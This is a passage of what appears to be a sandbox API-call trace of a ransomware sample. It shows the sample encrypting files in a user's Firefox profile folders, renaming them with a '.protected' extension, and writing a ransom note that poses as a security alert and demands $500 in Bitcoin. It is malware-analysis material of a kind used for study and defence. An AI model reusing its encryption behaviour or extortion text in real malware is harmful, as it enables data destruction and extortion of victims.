(in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.429] CloseHandle (hObject=0xd8) returned 1 [0090.430] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Windows") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Program Files") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Program Files (x86)") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="$Recycle.bin") returned 1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="System Volume Information") returned -1 [0090.430] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox") returned 65 [0090.430] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0090.430] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0090.430] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned 67 [0090.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.430] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.430] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.430] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\.") returned 67 [0090.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.431] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\..") returned 68 [0090.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Windows") returned -1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Program Files") returned -1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Program Files (x86)") returned -1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="$Recycle.bin") returned 1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="System Volume Information") returned -1 [0090.431] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 79 [0090.431] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0090.431] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0090.431] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned 81 [0090.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.432] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.432] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.") returned 81 [0090.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.432] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.432] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\..") returned 82 [0090.432] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.432] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.432] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="$Recycle.bin") returned 1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.432] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch=".protected") returned 0x0 [0090.432] lstrcmpW (lpString1="InstallTime20131025151332", lpString2="RESTORE_FILES.txt") returned -1 [0090.432] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.432] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".txt") returned 0x0 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".rar") returned 0x0 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".zip") returned 0x0 [0090.433] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xa, lpOverlapped=0x0) returned 1 [0090.434] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xa, lpOverlapped=0x0) returned 1 [0090.434] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.434] CloseHandle (hObject=0x150) returned 1 [0090.435] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.protected") returned 115 [0090.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.protected")) returned 1 [0090.443] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.443] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.443] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\RESTORE_FILES.txt") returned 97 [0090.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.444] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.444] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.444] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.444] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.445] CloseHandle (hObject=0x14c) returned 1 [0090.445] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Windows") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Program Files") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="Program Files (x86)") returned -1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="$Recycle.bin") returned 1 [0090.445] lstrcmpiW (lpString1="Profiles", lpString2="System Volume Information") returned -1 [0090.445] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 74 [0090.445] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0090.445] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0090.446] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned 76 [0090.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.446] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.446] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.446] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.446] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned 76 [0090.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.446] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.447] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.447] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned 77 [0090.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.447] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Windows") returned -1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="Program Files (x86)") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="$Recycle.bin") returned 1 [0090.447] lstrcmpiW (lpString1="silmbjec.default", lpString2="System Volume Information") returned -1 [0090.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 91 [0090.447] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0090.447] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0090.447] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned 93 [0090.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.459] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\.") returned 93 [0090.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.459] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.461] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.461] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\..") returned 94 [0090.461] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.461] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Windows") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Program Files") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="Program Files (x86)") returned -1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="$Recycle.bin") returned 1 [0090.461] lstrcmpiW (lpString1="addons.json", lpString2="System Volume Information") returned -1 [0090.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.461] StrStrIW (lpFirst="addons.json", lpSrch=".protected") returned 0x0 [0090.461] lstrcmpW (lpString1="addons.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.461] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.461] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".txt") returned 0x0 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".rar") returned 0x0 [0090.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 103 [0090.462] StrStrW (lpFirst="addons.json", lpSrch=".zip") returned 0x0 [0090.462] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x18, lpOverlapped=0x0) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x18, lpOverlapped=0x0) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.463] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.463] CloseHandle (hObject=0x154) returned 1 [0090.463] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.protected") returned 113 [0090.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.protected")) returned 1 [0090.464] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Windows") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Program Files") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Program Files (x86)") returned -1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="$Recycle.bin") returned 1 [0090.464] lstrcmpiW (lpString1="bookmarkbackups", lpString2="System Volume Information") returned -1 [0090.464] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 107 [0090.464] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0090.464] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0090.465] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*") returned 109 [0090.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 